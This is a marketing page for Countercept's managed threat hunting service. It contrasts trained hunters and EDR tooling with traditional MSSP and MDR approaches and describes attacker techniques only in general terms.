Managed Threat hunting
No matter how good your technology, it’s worthless without the right people to utilize it: individuals with the right skills and the right experience, keenly engaged in their role.
HUNTING IS A MINDSET, NOT JUST NEW TECHNOLOGY
MSSPs vs MANAGED THREAT HUNTING
The traditional approach to detection, as adopted by Managed Security Service Providers (MSSPs), conjures up images of dynamic dashboards and flashing red lights – possibly even a shiny ‘threat map’. The purpose of these gimmicks is to divert attention away from the underlying detection principles, which are archaic – based on rules and alerts. You cannot reveal a targeted attack with rules and alerts, as the modern threat actor utilizes signature-less attacks and then carries out actions masquerading as a legitimate internal user.
Rather than alerts notifying analysts of ‘known-knowns’, Countercept uses trained threat hunters and anomaly-based methods to detect previously unknown attacks.
MDR vs MANAGED THREAT HUNTING
Threat Hunting is a fresh approach that relies on the hunt team’s experience and a deep knowledge of attacker operations to continuously generate hypotheses that uncover and contain compromise on your network. Hunt sprints are conducted across data from endpoints, network, and logs to gain complete visibility across the breadth of the kill-chain.
MDR services provide, as the name implies, “Managed EDR”, which delivers 'light-touch', highly automated hunting capabilities often focused solely at the endpoint. This misses important attack vectors and provides limited capability to deal with the threat once it has been identified.
A WORLD-LEADING HUNT TEAM
Having conducted countless Targeted Attack Simulations ourselves, Countercept’s hunt team are offensively trained, meaning that we know what to look for based on what we would do next if we were performing the attack. The team also comprises qualified incident responders who can rapidly take action to contain an attack.
The Countercept team have a deep understanding of OS internals, malware analysis and the utilization of both on-disk and live memory forensics to reveal attacks.
Modern tech for modern attacks
To reveal advanced attacks, a threat hunter needs the tooling to cover modern attack paths. This technology is known as Endpoint Detection and Response, or an EDR tool. An effective EDR tool will enable the investigation of anomalous activity in the live memory and operating systems of endpoints, from initial code execution, persistence, lateral movement, and even attackers ‘living off the land’ using legitimate tools such as PowerShell.
Clearly, a tool that alerts a security team to every instance of PowerShell will quickly be discarded, so it is the data from the EDR combined with the skill of the threat hunter to cross-correlate against other data that enables effective hunting.
Traditional tech for traditional attacks
As threats have developed in sophistication and capability, traditional MSSP security vendors have simply responded with ‘more of the same’. Faster log analysis, more events per second, wider network coverage – none of which works in the face of completely new attack techniques.
Threat intelligence, rules, alerts and signatures are powerless when it comes to revealing advanced attacks, leaving most companies blind to the earliest – and most crucial – stages of an attack.